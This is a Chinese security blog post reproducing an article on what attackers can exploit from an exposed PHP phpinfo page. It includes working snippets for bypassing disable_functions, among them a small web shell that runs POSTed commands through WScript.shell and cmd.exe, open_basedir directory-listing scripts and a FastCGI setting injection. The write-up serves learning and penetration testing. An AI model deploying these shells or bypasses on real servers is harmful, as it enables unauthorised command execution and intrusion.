<!DOCTYPE html><html lang="zh"><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description" content="Yumi"><title>phpinfo信息利用 | phyb0x'Blog</title><link rel="stylesheet" type="text/css" href="/css/style.css?v=1.0.0"><link rel="stylesheet" type="text/css" href="//cdn.jsdelivr.net/npm/normalize.css/normalize.min.css"><link rel="stylesheet" type="text/css" href="//cdn.jsdelivr.net/npm/purecss/build/pure-min.min.css"><link rel="stylesheet" type="text/css" href="//cdn.jsdelivr.net/npm/purecss/build/grids-responsive-min.css"><link rel="stylesheet" href="//cdn.jsdelivr.net/npm/font-awesome@4.7.0/css/font-awesome.min.css"><script type="text/javascript" src="//cdn.jsdelivr.net/npm/jquery/dist/jquery.min.js"></script><link rel="icon" mask="" sizes="any" href="/favicon.ico"><link rel="Shortcut Icon" type="image/x-icon" href="/favicon.ico"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><link rel="apple-touch-icon-precomposed" href="/apple-touch-icon.png"><link rel="alternate" type="application/atom+xml" href="/atom.xml"><script>var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = 'https://hm.baidu.com/hm.js?' + '407830c4543cf3fb1dd23c4a26528c03';
  var s = document.getElementsByTagName("script")[0];
  s.parentNode.insertBefore(hm, s);
  })();
</script><script type="text/javascript" src="//cdn.jsdelivr.net/npm/clipboard/dist/clipboard.min.js"></script><script type="text/javascript" src="//cdn.jsdelivr.net/gh/codeseven/toastr/build/toastr.min.js"></script><link rel="stylesheet" href="//cdn.jsdelivr.net/gh/codeseven/toastr/build/toastr.min.css"><meta name="generator" content="Hexo 5.4.0"></head><body><div class="body_container"><div id="header"><div class="site-name"><h1 class="hidden">phpinfo信息利用</h1><a id="logo" href="/.">phyb0x'Blog</a><p class="description">智能安全初学者</p></div><div id="nav-menu"><a class="current" href="/."><i class="fa fa-home"> Start</i></a><a href="/archives/"><i class="fa fa-archive"> Archiv</i></a><a href="/about/"><i class="fa fa-user"> Über</i></a><a href="/atom.xml"><i class="fa fa-rss"> RSS</i></a></div></div><div class="pure-g" id="layout"><div class="pure-u-1 pure-u-md-3-4"><div class="content_container"><div class="post"><h1 class="post-title">phpinfo信息利用</h1><div class="post-meta">2018-12-01<span> | </span><span class="category"><a href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a></span><script src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script><span id="busuanzi_container_page_pv"> | <span id="busuanzi_value_page_pv"></span><span> Hits</span></span><span class="post-time"><span class="post-meta-item-text"> | </span><span class="post-meta-item-icon"><i class="fa fa-keyboard-o"></i><span class="post-count"> 1.5k</span><span class="post-meta-item-text"> Words</span></span></span><span class="post-time"> | <span class="post-meta-item-icon"><i class="fa fa-clock-o"></i><span class="post-count"> 6</span><span class="post-meta-item-text"> Minutes</span></span></span></div><a class="disqus-comment-count" href="/2018/12/01/phpinfo%E4%BF%A1%E6%81%AF%E5%88%A9%E7%94%A8/#vcomment"><span class="valine-comment-count" data-xid="/2018/12/01/phpinfo%E4%BF%A1%E6%81%AF%E5%88%A9%E7%94%A8/"></span><span> Comment</span></a><div class="post-content"><h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>电脑凉了，充不进去电很难受，买了块电池看看怎样，一周没有电脑的日子很难过啊。在实验室刷tools在评论里看到篇文章很不错，拿来复现下。</p>
<span id="more"></span>

<p>原文地址</p>
<p><a target="_blank" rel="noopener" href="http://zeroyu.xyz/2018/11/13/what-phpinfo-can-tell-we/">http://zeroyu.xyz/2018/11/13/what-phpinfo-can-tell-we/</a></p>
<h3 id="phpinfo页面利用"><a href="#phpinfo页面利用" class="headerlink" title="phpinfo页面利用"></a>phpinfo页面利用</h3><h4 id="system"><a href="#system" class="headerlink" title="system"></a>system</h4><p><img src="https://i.imgur.com/vM7tmOA.png"></p>
<p>获取具体版本，可以用来提权</p>
<h4 id="extension-dir"><a href="#extension-dir" class="headerlink" title="extension_dir"></a>extension_dir</h4><p><img src="https://i.imgur.com/zTd8b7D.png"></p>
<p>php扩展的路径，图省事没用lamp包有点捞…(这里还是说下linux不推荐用phpstudy，很多linux装了phpstudy系统会崩)</p>
<h4 id="http-x-real-ip"><a href="#http-x-real-ip" class="headerlink" title="http_x_real_ip"></a>http_x_real_ip</h4><p>直接获取真实ip，无视代理、cdn。本地环境并没有发现这个参数，应该是ini配置问题。顺便说下<code>HTTP_X_FORWARDED_FOR</code>的区别，<code>HTTP_X_FORWARDED_FOR</code>会记录代理过程且可伪造</p>
<h4 id="web根目录"><a href="#web根目录" class="headerlink" title="web根目录"></a>web根目录</h4><p><img src="https://i.imgur.com/qm8Tl9q.png"></p>
<p>找不到路径，报错/找phpinfo常规操作了。</p>
<h4 id="临时文件"><a href="#临时文件" class="headerlink" title="临时文件"></a>临时文件</h4><p>phpinfo-lfi  getshell 很老的洞了，看到学习下</p>
<p>像phpinfo页面post数据可以在_FILES[“file1”]中看到上传的临时文件，先构造简单上传页面。</p>
<p><img src="https://i.imgur.com/e8VD0JJ.png"></p>
<p>其中PHP引擎对enctype=”multipart/form-data”这种请求的处理过程如下：</p>
<pre><code>1、请求到达
2、创建临时文件，并写入上传文件的内容
3、调用相应PHP脚本进行处理，如校验名称、大小等
4、删除临时文件
</code></pre>
<p><img src="https://i.imgur.com/wjQozjF.png"></p>
<p>这里可以看到，临时文件可以成功写入，配合lfi即可getshell，不过临时文件很块就会被删除，利用分块传输竞争时间绕过</p>
<p><a target="_blank" rel="noopener" href="https://www.insomniasec.com/downloads/publications/phpinfolfi.py">https://www.insomniasec.com/downloads/publications/phpinfolfi.py</a></p>
<p>利用脚本，不过我本地测试失败了</p>
<p>这里说下这个漏洞感觉还是比较鸡肋(条件有点苛刻)</p>
<pre><code>1、phpinfo
2、开启了文件缓存
3、没有gpc等函数限制
4、开启lfi，有包含点
</code></pre>
<h4 id="allow-url-include"><a href="#allow-url-include" class="headerlink" title="allow_url_include"></a>allow_url_include</h4><p>文件包含有多重要自不必多说。</p>
<h4 id="asp-tags"><a href="#asp-tags" class="headerlink" title="asp_tags"></a>asp_tags</h4><p><img src="https://i.imgur.com/kha1ISI.png"></p>
<p>php标签有四种格式，这个是asp风格的，默认不开启。可以上传.haccess/user.ini 绕过(php7移除)</p>
<h4 id="disable-functions"><a href="#disable-functions" class="headerlink" title="disable_functions"></a>disable_functions</h4><p>禁用函数列表：</p>
<pre><code>(dl)
exec
system
passthru
popen
proc_open
pcntl_exec
shell_exec
</code></pre>
<h5 id="绕过方式"><a href="#绕过方式" class="headerlink" title="绕过方式:"></a>绕过方式:</h5><p>1、记得Seay代码审计里说过<code>dl()</code>函数(需要enable_dl开启)</p>
<pre><code>&lt;?php
//PHP5调用方法
dl(&#39;../../../../../home/apache/htdocs/php5.so&#39;);
spiderbiguan(&#39;uname -a&#39;);//调用函数
?&gt;
</code></pre>
<p>2、编译php时如果加了-–enable-pcntl选项，就可以使用pcntl_exec()来执行命令。PHP&gt;4.2.0</p>
<pre><code>&lt;?php pcntl_exec(“/bin/bash”, array(“/tmp/b4dboy.sh”));?&gt;

#/tmp/b4dboy.sh
#!/bin/bash
ls -l /
</code></pre>
<p>3、利用ImageMagick漏洞绕过disable_function(应该是要组件与扩展都有具体没测试)</p>
<p><a target="_blank" rel="noopener" href="https://www.waitalone.cn/imagemagic-bypass-disable_function.html">https://www.waitalone.cn/imagemagic-bypass-disable_function.html</a></p>
<p>4、利用环境变量LD_PRELOAD来绕过</p>
<p><a target="_blank" rel="noopener" href="http://www.vuln.cn/6784">http://www.vuln.cn/6784</a>的确是一种好方法，利用起来也没有那么繁琐。</p>
<p>5、win系统组件</p>
<pre><code>&lt;?php
$command=$_POST[a];
$wsh = new COM(&#39;WScript.shell&#39;); // 生成一个COM对象
$exec = $wsh-&gt;exec(&#39;cmd.exe /c &#39;.$command);  //调用对象方法来执行命令
$stdout = $exec-&gt;StdOut();
$stroutput = $stdout-&gt;ReadAll();
echo $stroutput
?&gt;
</code></pre>
<h4 id="magic-quotes-gpc"><a href="#magic-quotes-gpc" class="headerlink" title="magic_quotes_gpc"></a>magic_quotes_gpc</h4><p>魔术引号，它是用来实现addslshes()和stripslashes()这两个功能的，对SQL注入进行防御。顺便提一嘴用了<code>addslshes()</code>除非是有编码问题要不然是不存在注入的。</p>
<p><img src="https://i.imgur.com/L7SIZ0Z.png"></p>
<h4 id="open-basedir"><a href="#open-basedir" class="headerlink" title="open_basedir"></a>open_basedir</h4><p>将用户可操作的文件限制在某目录下</p>
<p><img src="https://i.imgur.com/2cTWcP9.png"></p>
<h5 id="绕过方式："><a href="#绕过方式：" class="headerlink" title="绕过方式："></a>绕过方式：</h5><p><a target="_blank" rel="noopener" href="https://www.leavesongs.com/PHP/php-bypass-open-basedir-list-directory.html">linux下绕过</a>(大佬博客我这里也复现下)</p>
<p>1、利用DirectoryIterator + Glob 直接列举目录(linux)</p>
<pre><code>&lt;?php
printf(&#39;&lt;b&gt;open_basedir : %s &lt;/b&gt;&lt;br /&gt;&#39;, ini_get(&#39;open_basedir&#39;));
$file_list = array();
// normal files
$it = new DirectoryIterator(&quot;glob:///*&quot;);
foreach($it as $f) &#123;
    $file_list[] = $f-&gt;__toString();
&#125;
// special files (starting with a dot(.))
$it = new DirectoryIterator(&quot;glob:///.*&quot;);
foreach($it as $f) &#123;
    $file_list[] = $f-&gt;__toString();
&#125;
sort($file_list);
foreach($file_list as $f)&#123;
        echo &quot;&#123;$f&#125;&lt;br/&gt;&quot;;
&#125;
?&gt;
</code></pre>
<p><img src="https://i.imgur.com/Dt0u4Ja.png"></p>
<p>2、realpath列举目录</p>
<p>利用realpath对传入路径的回显不同加上通配符进行列举。本地环境linux就没有进行测试。</p>
<pre><code>&lt;?php
ini_set(&#39;open_basedir&#39;, dirname(__FILE__));
printf(&quot;&lt;b&gt;open_basedir: %s&lt;/b&gt;&lt;br /&gt;&quot;, ini_get(&#39;open_basedir&#39;));
set_error_handler(&#39;isexists&#39;);
$dir = &#39;d:/test/&#39;;
$file = &#39;&#39;;
$chars = &#39;abcdefghijklmnopqrstuvwxyz0123456789_&#39;;
for ($i=0; $i &lt; strlen($chars); $i++) &#123; 
    $file = $dir . $chars[$i] . &#39;&lt;&gt;&lt;&#39;;
    realpath($file);
&#125;
function isexists($errno, $errstr)
&#123;
    $regexp = &#39;/File\((.*)\) is not within/&#39;;
    preg_match($regexp, $errstr, $matches);
    if (isset($matches[1])) &#123;
        printf(&quot;%s &lt;br/&gt;&quot;, $matches[1]);
    &#125;
&#125;
?&gt;
</code></pre>
<p>首先设置open_basedir为当前目录，并枚举d:/test/目录下的所有文件。将错误处理交给isexists函数，在isexists函数中匹配出目录名称，并打印出来。</p>
<p>3、SplFileInfo::getRealPath列举目录</p>
<p>不需要考虑open_basedir开不开起。</p>
<pre><code>&lt;?php
ini_set(&#39;open_basedir&#39;, dirname(__FILE__));
printf(&quot;&lt;b&gt;open_basedir: %s&lt;/b&gt;&lt;br /&gt;&quot;, ini_get(&#39;open_basedir&#39;));
$basedir = &#39;D:/test/&#39;;
$arr = array();
$chars = &#39;abcdefghijklmnopqrstuvwxyz0123456789&#39;;
for ($i=0; $i &lt; strlen($chars); $i++) &#123; 
    $info = new SplFileInfo($basedir . $chars[$i] . &#39;&lt;&gt;&lt;&#39;);
    $re = $info-&gt;getRealPath();
    if ($re) &#123;
        dump($re);
    &#125;
&#125;
function dump($s)&#123;
    echo $s . &#39;&lt;br/&gt;&#39;;
    ob_flush();
    flush();
&#125;
?&gt;
</code></pre>
<p>还有GD库imageftbbox/imagefttext列举目录bindtextdomain暴力猜解目录，基本也都是要暴力破解，效率比较低。还有这篇文章<a target="_blank" rel="noopener" href="https://www.leavesongs.com/bypass-open-basedir-readfile.html">php5全版本绕过open_basedir读文件脚本</a>给跪了</p>
<h3 id="扩展"><a href="#扩展" class="headerlink" title="扩展"></a>扩展</h3><h4 id="imagick"><a href="#imagick" class="headerlink" title="imagick"></a>imagick</h4><p><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/502e39c122e6">这个的远程执行</a></p>
<h4 id="libxml"><a href="#libxml" class="headerlink" title="libxml"></a>libxml</h4><p>libxml 2.9以前的版本默认支持并开启了外部实体的引用，服务端解析用户提交的 xml 文件时未对 xml 文件引用的外部实体（含外部普通实体和外部参数实体）做合适的处理，会导致XXE。</p>
<h4 id="memcache"><a href="#memcache" class="headerlink" title="memcache"></a>memcache</h4><p><a target="_blank" rel="noopener" href="http://blog.nsfocus.net/memcache-unauthorized-access-exploit/">Memcache未授权访问漏洞利用及修复</a></p>
<p><img src="https://i.imgur.com/JoEN21l.png"></p>
<h4 id="redis"><a href="#redis" class="headerlink" title="redis"></a>redis</h4><p>这个不多说了……</p>
<h4 id="session"><a href="#session" class="headerlink" title="session"></a>session</h4><h4 id="xdebug"><a href="#xdebug" class="headerlink" title="xdebug"></a>xdebug</h4><h4 id="GOPHER"><a href="#GOPHER" class="headerlink" title="GOPHER"></a>GOPHER</h4><p><a target="_blank" rel="noopener" href="https://blog.chaitin.cn/gopher-attack-surfaces/">利用 Gopher 协议拓展攻击面</a><br>看了下尝试复现没有成功，我的理解是首先要支持gopher协议，然后找到一个能执行curl会话的参数，构造gopher格式的payload以post格式去执行反弹shell。(并没有看懂是怎么利用的)</p>
<h4 id="fastcgi"><a href="#fastcgi" class="headerlink" title="fastcgi"></a>fastcgi</h4><p><a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/fastcgi-and-php-fpm.html#php-fpmfastcgi">https://www.leavesongs.com/PENETRATION/fastcgi-and-php-fpm.html#php-fpmfastcgi</a></p>
<p>通过fastcgi传入环境变量，设置</p>
<pre><code>&#39;PHP_VALUE&#39;: &#39;auto_prepend_file =php://input&#39;,
&#39;PHP_ADMIN_VALUE&#39;: &#39;allow_url_include = On&#39;
</code></pre>
<p>将执行的代码放在body中执行任意代码。</p>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>从刚接触安全的时候就知道phpinfo里有很重要的信息，然而就在前几天我还直接提了个信息泄露(还撞了，丢脸),复现完真的学到很多。</p>
<p>参考链接：</p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/79830.html">https://www.freebuf.com/articles/web/79830.html</a></p>
<p><a target="_blank" rel="noopener" href="http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0151653.html">http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0151653.html</a></p>
<p><a target="_blank" rel="noopener" href="https://bbs.ichunqiu.com/thread-3234-1-1.html">https://bbs.ichunqiu.com/thread-3234-1-1.html</a></p>
</div><div id="donate"><link rel="stylesheet" type="text/css" href="/css/donate.css"><script type="text/javascript" src="/js/donate.js" successtext="Copy Successed!"></script><a class="pos-f tr3" id="github" target="_blank" rel="noopener" href="https://github.com/Kaiyuan/donate-page" arget="_blank" title="Github"></a><div id="DonateText">Donate</div><ul class="list pos-f" id="donateBox"><li id="AliPay" qr="/img/airpy.png"></li></ul><div class="pos-f left-100" id="QRBox"><div id="MainBox"></div></div></div><div class="tags"></div><div class="post-nav"><a class="pre" href="/2018/12/01/powershell%E8%BF%90%E7%94%A8/">powershell运用</a><a class="next" href="/2018/11/12/thinkphp%E5%AE%A1%E8%AE%A1/">thinkphp审计</a></div><div id="vcomment"></div><script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script><script src="//unpkg.com/valine@latest/dist/Valine.min.js"></script><script>var notify = 'false' == 'true' ? true : false;
var verify = 'false' == 'true' ? true : false;
var GUEST_INFO = ['nick','mail','link'];
var guest_info = 'nick,mail,link'.split(',').filter(function(item){
  return GUEST_INFO.indexOf(item) > -1
});
guest_info = guest_info.length == 0 ? GUEST_INFO :guest_info;
window.valine = new Valine({
  el:'#vcomment',
  notify:notify,
  verify:verify,
  appId:'MhBSauY8QdXDPd9mzDsCmUQ8-gzGzoHsz',
  appKey:'BwJxec1eCc5PCTXUcPKUHRl0',
  placeholder:'我就只是想看看，字都懒得打...',
  avatar:'mm',
  guest_info:guest_info,
  pageSize:'10'
})
</script></div></div></div><div class="pure-u-1-4 hidden_mid_and_down"><div id="sidebar"><div class="widget"><div class="widget-title"><i class="fa fa-folder-o"> Kategorien</i></div><ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/CTF/">CTF</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%9F%BA%E7%A1%80%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/">基础漏洞总结</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%84%9A%E6%9C%AC%E5%B7%A5%E5%85%B7/">脚本工具</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%BF%90%E7%BB%B4/">运维</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-star-o"> Tags</i></div><div class="tagcloud"></div></div><div class="widget"><div class="widget-title"><i class="fa fa-file-o"> Letzte</i></div><ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2019/01/20/%E8%BF%87Waf/">sql绕安全狗</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/17/weblogic%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E6%B1%87%E6%80%BB/">weblogic漏洞利用汇总</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/14/jsonp%E5%AE%89%E5%85%A8/">jsonp安全</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/29/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/">横向移动</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/28/ARP%E6%AC%BA%E9%AA%97/">ARP欺骗</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/28/ew%E5%A4%9A%E7%BA%A7%E8%BD%AC%E5%8F%91/">ew多级转发</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/25/SSRF%E6%B5%85%E6%9E%90/">SSRF浅析</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/23/xxe%E6%B5%85%E6%9E%90/">xxe浅析</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/21/win%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/">win权限维持</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/11/sql%E6%B3%A8%E5%85%A5%E5%B0%8F%E7%BB%93/">sql注入小结</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-external-link"> Blogroll</i></div><ul></ul><a target="_blank"></a><ul></ul><a target="_blank"></a><ul></ul><a target="_blank"></a></div></div></div><div class="pure-u-1 pure-u-md-3-4"><div id="footer">Copyright © 2021 <a href="/." rel="nofollow">phyb0x'Blog.</a> Powered by<a rel="nofollow" target="_blank" href="https://hexo.io"> Hexo.</a><a rel="nofollow" target="_blank" href="https://github.com/tufu9441/maupassant-hexo"> Theme</a> by<a rel="nofollow" target="_blank" href="https://github.com/pagecho"> Cho.</a></div></div></div><a class="show" id="rocket" href="#top"></a><script type="text/javascript" src="/js/totop.js?v=1.0.0" async></script><script type="text/javascript" src="//cdn.jsdelivr.net/gh/fancyapps/fancybox/dist/jquery.fancybox.min.js" async></script><script type="text/javascript" src="/js/fancybox.js?v=1.0.0" async></script><link rel="stylesheet" type="text/css" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox/dist/jquery.fancybox.min.css"><script type="text/javascript" src="/js/copycode.js" successtext="Copy Successed!"></script><link rel="stylesheet" type="text/css" href="/css/copycode.css"><script type="text/javascript" src="/js/codeblock-resizer.js?v=1.0.0"></script><script type="text/javascript" src="/js/smartresize.js?v=1.0.0"></script></div></body></html>